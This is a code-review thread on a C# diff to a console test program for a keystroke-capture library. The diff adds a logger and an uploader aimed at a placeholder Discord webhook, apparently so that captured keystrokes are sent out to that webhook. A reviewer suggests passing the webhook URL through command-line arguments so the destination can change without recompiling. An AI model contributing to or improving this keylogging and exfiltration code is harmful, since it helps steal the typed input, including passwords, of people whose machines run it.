Keystroke.ConsoleAppTest/Program.cs

```diff
@@ -1,16 +1,32 @@
 ﻿using Keystroke.API;
 using System;
+using System.Runtime.CompilerServices;
 using System.Windows.Forms;
+using Keystroke.API.CallbackObjects;
+using Keystroke.API.Helpers;
 
 namespace ConsoleApplicationTest
 {
 	class Program
 	{
 		static void Main(string[] args)
 		{
+			// Create Loggin Save Request (1)
+			LoggerSaver log = new LoggerSaver();
+			// Create your discord url webhook (3)
+			LoggerUploader LogUpload = new LoggerUploader("Discord URL WEBHOOK");
```

Comment:
One interesting thing to add here is to get this value from `args` parameter (if it was sent). So the discord webhook can be changed without needing to recompile the app

Reply:
Just a suggestion for further updates if you want